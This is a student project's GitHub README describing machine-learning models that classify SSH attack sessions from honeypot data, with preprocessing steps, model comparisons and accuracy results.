SSH Attack Detection Using Machine Learning

This README provides a comprehensive overview of the SSH Attack Detection project using machine learning techniques. For a more detailed explanation of the project, including data analysis, methodologies, and in-depth results, please refer to the SSH_ATTACKS_FINAL_VERSION.pdf file located in the project directory.
The PDF contains all the technical details, charts, and metrics that were part of this project. It is recommended to review the document for a deeper understanding of the results and the reasoning behind our machine learning models.

Overview

This project investigates the use of machine learning algorithms to detect and classify SSH shell attacks. It is inspired by the growing importance of network security, particularly in detecting malicious attempts on SSH servers. By leveraging both supervised and unsupervised learning models, this project aims to identify attack patterns and enhance the ability to predict future attacks with greater accuracy.

The dataset used consists of over 233,000 rows, each representing a session with a set of commands executed by attackers on a honeypot environment. This project focuses on transforming raw session data into meaningful insights through various machine learning techniques.

Authors

Lorenzo Ferretti (s331942)
Alessio Mantineo (s324267)
Carmen Moncada (s296675)
Riccardo Tommasi (s323816)

Introduction

SSH is a critical protocol used to access servers remotely. Due to its importance, it is a common target for attackers. This project is focused on detecting attacks in real-time using machine learning models. The goal is to improve the identification of malicious activity using advanced algorithms that can learn and adapt from historical data.

Machine learning techniques offer promising solutions to quickly analyze and detect abnormal patterns that might otherwise go unnoticed by human analysts. The dataset used for this project captures command sequences executed by attackers on a honeypot and provides a unique opportunity to apply machine learning to cybersecurity.

Dataset and Pre-Processing

Data Exploration

The dataset contains more than 230,000 rows, with each row representing a complete SSH session. Attack sessions contain a sequence of commands executed by an attacker. For the purpose of this analysis, benign sessions were filtered out, and only attack-related sessions were retained.

Key observations:

The frequency of attacks varies over time, with notable peaks during certain periods, especially around the end of 2019 and early 2020. This indicates specific patterns of attack that may correspond to real-world scenarios where companies have reduced activity or fewer monitoring personnel.
Most attacks fall into categories such as "Discovery," "Persistence," and "Execution," with "Defense Evasion" and other intents being less frequent.

Pre-Processing: Improving Data Quality

The raw dataset consists of sessions with commands that are often encoded (e.g., base64 encoding). We applied decoding techniques to make these commands readable and actionable for the analysis.

Key Steps:

A base64 decoding function was applied to remove obfuscation from commands, particularly to detect malicious activities more effectively.
Command sequences were split and processed into structured formats, using techniques like Term Frequency-Inverse Document Frequency (TF-IDF) to transform raw text into numerical features.
Data was cleaned to remove irrelevant information, including temporary files and unrelated command sequences.

Transformation Techniques

To convert the text data into a usable format for machine learning models, we used TF-IDF to generate new feature vectors based on the frequency of commands in each session. This allowed us to create a structured dataset that can be easily processed by classification and clustering algorithms.

Data Sampling

Given the large size of the dataset, a sampling technique was employed to reduce the computational load. We reduced the dataset to approximately 5,853 samples while ensuring that the dataset remained representative of the full set of attack categories.

Standardization of Multi-Label Categories

The MultiLabelBinarizer technique was used to handle multi-label classification, where each session could belong to multiple attack categories. This transformation was crucial for applying supervised learning algorithms effectively.

Supervised Learning Models

Random Forest

Random Forest is an ensemble classifier that uses multiple decision trees to make predictions. In this project, it was used to classify attack sessions based on the transformed features.

Key Metrics:

High accuracy (~98%) on both training and test sets.
Precision, recall, and F1-scores were high for categories like "Discovery" and "Execution," but performance was lower for less common categories like "Harmless" and "Impact."
Overfitting was detected in some categories, particularly for those with lower support.

K-Nearest Neighbors (K-NN)

The K-NN algorithm classifies a session by finding the most common labels among its nearest neighbors in the dataset. This model performed comparably to Random Forest, with similar levels of accuracy but more balanced performance across smaller classes.

Key Metrics:

K-NN demonstrated better macro-average F1-scores for smaller classes like "Impact" and "Other."
Overfitting was still present, but to a lesser degree compared to Random Forest.

Unsupervised Learning Models

K-Means

K-Means clustering was applied to group sessions into clusters based on their command sequences. By tuning the number of clusters, we were able to analyze the natural grouping of attack types.

Gaussian Mixture Model (GMM)

The GMM algorithm was also applied for clustering, allowing for more flexibility by modeling clusters as Gaussian distributions. Both clustering models revealed meaningful patterns in the dataset, particularly in distinguishing between different types of attacks.

Language Models and Neural Networks

Doc2Vec and Neural Network Model

The Doc2Vec model was used to represent the text data as vectors, which were then fed into a neural network built using Keras. This model aimed to capture deeper relationships between command sequences that were not evident from traditional methods.

Key Steps:

The neural network model was trained on the vectorized data using various hyperparameter combinations, including different vector sizes (100, 300, and 800) and learning rates.
Experiments showed that larger vector sizes led to better performance but required more computational resources.

Results and Analysis

Hyper-Parameter Tuning

Both supervised models underwent hyper-parameter tuning using GridSearch to find the best combination of settings. Random Forest achieved its best performance with 30 estimators and a maximum depth of 10, resulting in a weighted F1-score of 99.2%.

Clustering Analysis

The clusters generated by K-Means and GMM revealed interesting patterns in the data, such as the concentration of "Persistence" and "Discovery" attacks towards the end of 2019. These insights could potentially help predict when similar attacks might occur in the future.

Final Considerations

The results indicate that machine learning models can be highly effective in identifying attack patterns within SSH session data. While Random Forest and K-NN models performed well, further improvements could be achieved by addressing the class imbalance, especially for less frequent attack categories.

Conclusion

This project demonstrates the feasibility of using machine learning models for detecting SSH attacks. Through supervised classification and unsupervised clustering, we were able to accurately predict attack types and identify patterns in large datasets. Future work could focus on refining the models to handle less common attack types more effectively and applying these techniques in real-time detection systems.

Name		Name	Last commit message	Last commit date
Latest commit History 165 Commits
images		images
.gitattributes		.gitattributes
.gitignore		.gitignore
README.md		README.md
SSH_ATTACKS_FINAL_VERSION.pdf		SSH_ATTACKS_FINAL_VERSION.pdf
df_features_bow.parquet		df_features_bow.parquet
df_features_bow_sampled.parquet		df_features_bow_sampled.parquet
df_features_tfidf.parquet		df_features_tfidf.parquet
df_features_tfidf_sampled.parquet		df_features_tfidf_sampled.parquet
features.txt		features.txt
preprocessing.ipynb		preprocessing.ipynb
section1_DataExploration_and_preprocessing.ipynb		section1_DataExploration_and_preprocessing.ipynb
section2_SupervisedLearning_Classification.ipynb		section2_SupervisedLearning_Classification.ipynb
section3_UnsupervisedLearning_Clustering.ipynb		section3_UnsupervisedLearning_Clustering.ipynb
section4_LanguageModelsExploration.ipynb		section4_LanguageModelsExploration.ipynb
ssh_attacks.ipynb		ssh_attacks.ipynb
ssh_attacks.parquet		ssh_attacks.parquet
ssh_attacks_decoded.parquet		ssh_attacks_decoded.parquet
ssh_attacks_decoded_splitted.parquet		ssh_attacks_decoded_splitted.parquet
train_test_split_sampled.ipynb		train_test_split_sampled.ipynb

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

SSH Attack Detection Using Machine Learning

Overview

Authors

Table of Contents

Introduction

Dataset and Pre-Processing

Data Exploration

Pre-Processing: Improving Data Quality

Transformation Techniques

Data Sampling

Standardization of Multi-Label Categories

Supervised Learning Models

Random Forest

K-Nearest Neighbors (K-NN)

Unsupervised Learning Models

K-Means

Gaussian Mixture Model (GMM)

Language Models and Neural Networks

Doc2Vec and Neural Network Model

Results and Analysis

Hyper-Parameter Tuning

Clustering Analysis

Final Considerations

Conclusion

About

Uh oh!

Releases

Packages

Contributors 4

Uh oh!

Languages

s331942/ssh_bash_attacks

Folders and files

Latest commit

History

Repository files navigation

SSH Attack Detection Using Machine Learning

Overview

Authors

Table of Contents

Introduction

Dataset and Pre-Processing

Data Exploration

Pre-Processing: Improving Data Quality

Transformation Techniques

Data Sampling

Standardization of Multi-Label Categories

Supervised Learning Models

Random Forest

K-Nearest Neighbors (K-NN)

Unsupervised Learning Models

K-Means

Gaussian Mixture Model (GMM)

Language Models and Neural Networks

Doc2Vec and Neural Network Model

Results and Analysis

Hyper-Parameter Tuning

Clustering Analysis

Final Considerations

Conclusion

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Contributors 4

Uh oh!

Languages

Packages